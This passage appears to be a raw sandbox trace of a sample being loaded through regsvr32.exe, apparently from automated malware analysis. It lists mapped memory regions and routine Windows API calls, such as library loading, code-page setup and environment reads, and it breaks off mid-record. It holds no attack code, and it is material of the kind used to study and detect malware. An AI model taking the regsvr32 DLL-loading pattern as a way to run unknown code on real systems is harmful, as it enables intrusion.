0x0 region_type = pagefile_backed name = "pagefile_0x0000000002270000" filename = "" Region: id = 540 start_va = 0x2280000 end_va = 0x22fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002280000" filename = "" Region: id = 541 start_va = 0x500000 end_va = 0x500fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 542 start_va = 0x2300000 end_va = 0x23dcfff monitored = 0 entry_point = 0x235e0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 543 start_va = 0x2300000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 544 start_va = 0x500000 end_va = 0x503fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 545 start_va = 0x2380000 end_va = 0x23c4fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000c.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db") Region: id = 546 start_va = 0x23d0000 end_va = 0x23d3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 547 start_va = 0x23e0000 end_va = 0x246dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 548 start_va = 0x2470000 end_va = 0x2470fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002470000" filename = "" Region: id = 549 start_va = 0x2470000 end_va = 0x2477fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windows.storage.dll.mui" filename = "\\Windows\\System32\\en-US\\windows.storage.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\windows.storage.dll.mui") Region: id = 550 start_va = 0x7ffe93af0000 end_va = 0x7ffe93b20fff monitored = 0 entry_point = 0x7ffe93af7d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 551 start_va = 0x2480000 end_va = 0x2480fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002480000" filename = "" Region: id = 552 start_va = 0x2480000 end_va = 0x2480fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002480000" filename = "" Region: id = 553 start_va = 0x7ffe95cb0000 end_va = 0x7ffe95d1efff monitored = 0 entry_point = 0x7ffe95cd5f70 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\System32\\coml2.dll" (normalized: "c:\\windows\\system32\\coml2.dll") Region: id = 554 start_va = 0x7ffe90890000 end_va = 0x7ffe9089cfff monitored = 0 entry_point = 0x7ffe90891ea0 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 555 start_va = 0x7ffe88140000 end_va = 0x7ffe8821afff monitored = 0 entry_point = 0x7ffe881528b0 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 556 start_va = 0x7ffe94280000 end_va = 0x7ffe942acfff monitored = 0 entry_point = 0x7ffe94299d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 557 start_va = 0x7ffe88110000 end_va = 0x7ffe88135fff monitored = 0 entry_point = 0x7ffe88111cf0 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 558 start_va = 0x7ffe8cbc0000 end_va = 0x7ffe8cbd1fff monitored = 0 entry_point = 0x7ffe8cbc3580 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 559 start_va = 0x7df5ffe40000 end_va = 0x7df5ffebdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\apppatch64\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\apppatch64\\sysmain.sdb") Region: id = 579 start_va = 0x7ffe93a10000 end_va = 0x7ffe93a1bfff monitored = 0 entry_point = 0x7ffe93a127e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Thread: id = 9 os_tid = 0x6a8 [0084.912] GetStartupInfoW (in: lpStartupInfo=0xcfed0 | out: lpStartupInfo=0xcfed0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\regsvr32.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0084.912] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff703d30000 [0084.913] __set_app_type (_Type=0x2) [0084.913] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff703d32b20) returned 0x0 [0084.913] __wgetmainargs (in: _Argc=0x7ff703d350e8, _Argv=0x7ff703d350f0, _Env=0x7ff703d350f8, _DoWildCard=0, _StartInfo=0x7ff703d35104 | out: _Argc=0x7ff703d350e8, _Argv=0x7ff703d350f0, _Env=0x7ff703d350f8) returned 0 [0084.913] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0084.913] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\Desktop\\5Dq6sWcmD.dll.ocx") returned 43 [0084.913] OleInitialize (pvReserved=0x0) returned 0x0 [0085.033] _wsplitpath_s (in: _FullPath="C:\\Users\\RDHJ0C~1\\Desktop\\5Dq6sWcmD.dll.ocx", _Drive=0x0, _DriveCount=0x0, _Dir=0x0, _DirCount=0x0, _Filename=0x0, _FilenameCount=0x0, _Ext=0xce760, _ExtCount=0x100 | out: _Drive=0x0, _Dir=0x0, _Filename=0x0, _Ext=".ocx") returned 0x0 [0085.033] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey=".ocx", ulOptions=0x0, samDesired=0x1, phkResult=0xce538 | out: phkResult=0xce538*=0x13e) returned 0x0 [0085.033] RegQueryValueExW (in: hKey=0x13e, lpValueName=0x0, lpReserved=0x0, lpType=0x0, lpData=0xce550, lpcbData=0xce530*=0x200 | out: lpType=0x0, lpData=0xce550*=0x6f, lpcbData=0xce530*=0x10) returned 0x0 [0085.033] RegCloseKey (hKey=0x13e) returned 0x0 [0085.034] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey="ocxfile", ulOptions=0x0, samDesired=0x1, phkResult=0xce538 | out: phkResult=0xce538*=0x13e) returned 0x0 [0085.034] RegOpenKeyExW (in: hKey=0x13e, lpSubKey="AutoRegister", ulOptions=0x0, samDesired=0x1, phkResult=0xce540 | out: phkResult=0xce540*=0x0) returned 0x2 [0085.034] RegCloseKey (hKey=0x13e) returned 0x0 [0085.034] SetErrorMode (uMode=0x1) returned 0x0 [0085.034] LoadLibraryExW (lpLibFileName="C:\\Users\\RDHJ0C~1\\Desktop\\5Dq6sWcmD.dll.ocx", hFile=0x0, dwFlags=0x8) returned 0x1dc0000 [0085.461] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffe94740000 [0085.461] GetProcAddress (hModule=0x7ffe94740000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffe94797c50 [0085.462] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffe94740000 [0085.462] GetProcAddress (hModule=0x7ffe94740000, lpProcName="FlsAlloc") returned 0x7ffe947a7e50 [0085.463] GetProcAddress (hModule=0x7ffe94740000, lpProcName="FlsSetValue") returned 0x7ffe94793cb0 [0085.463] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffe94740000 [0085.464] GetProcAddress (hModule=0x7ffe94740000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffe94797c50 [0085.464] GetProcessHeap () returned 0x5a0000 [0085.464] GetLastError () returned 0x7a [0085.464] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x3c8) returned 0x5c44b0 [0085.464] SetLastError (dwErrCode=0x7a) [0085.465] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x1200) returned 0x5c4880 [0085.466] GetStartupInfoW (in: lpStartupInfo=0xce260 | out: lpStartupInfo=0xce260*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\regsvr32.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0085.466] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0085.466] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0085.466] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0085.466] GetCommandLineA () returned="\"C:\\Windows\\System32\\regsvr32.exe\" \"C:\\Users\\RDHJ0C~1\\Desktop\\5Dq6sWcmD.dll.ocx\"" [0085.466] GetCommandLineW () returned="\"C:\\Windows\\System32\\regsvr32.exe\" \"C:\\Users\\RDHJ0C~1\\Desktop\\5Dq6sWcmD.dll.ocx\"" [0085.466] GetACP () returned 0x4e4 [0085.466] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x228) returned 0x5c5a90 [0085.467] IsValidCodePage (CodePage=0x4e4) returned 1 [0085.467] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0xce000 | out: lpCPInfo=0xce000) returned 1 [0085.467] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0xcd8a0 | out: lpCPInfo=0xcd8a0) returned 1 [0085.467] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xcd8c0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0085.467] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xcd8c0, cbMultiByte=256, lpWideCharStr=0xcd5f0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0085.467] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpCharType=0xcdbc0 | out: lpCharType=0xcdbc0) returned 1 [0085.467] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xcd8c0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0085.467] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xcd8c0, cbMultiByte=256, lpWideCharStr=0xcd590, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0085.467] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffe94740000 [0085.467] GetProcAddress (hModule=0x7ffe94740000, lpProcName="LCMapStringEx") returned 0x7ffe94755350 [0085.467] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0085.467] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0xcd380, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0085.467] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0xcd9c0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", lpUsedDefaultChar=0x0) returned 256 [0085.467] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xcd8c0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0085.467] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xcd8c0, cbMultiByte=256, lpWideCharStr=0xcd590, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0085.467] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0085.467] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0xcd380, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0085.468] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0xcdac0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0085.468] RtlInitializeSListHead (in: ListHead=0x1de13c0 | out: ListHead=0x1de13c0) [0085.468] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x1000) returned 0x5c5cc0 [0085.468] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xce0b0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\regsvr32.exe" (normalized: "c:\\windows\\system32\\regsvr32.exe")) returned 0x20 [0085.468] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x7ffe954a0000 [0085.469] GetProcAddress (hModule=0x7ffe954a0000, lpProcName="AreFileApisANSI") returned 0x7ffe954c4820 [0085.469] AreFileApisANSI () returned 1 [0085.469] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\regsvr32.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0085.469] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\regsvr32.exe", cchWideChar=-1, lpMultiByteStr=0x1de15d0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\regsvr32.exe", lpUsedDefaultChar=0x0) returned 33 [0085.469] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x65) returned 0x5c6cd0 [0085.469] GetEnvironmentStringsW () returned 0x5c6d40* [0085.469] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1311, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1311 [0085.469] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x51f) returned 0x5c7790 [0085.469] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1311, lpMultiByteStr=0x5c7790, cbMultiByte=1311, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1311 [0085.469] 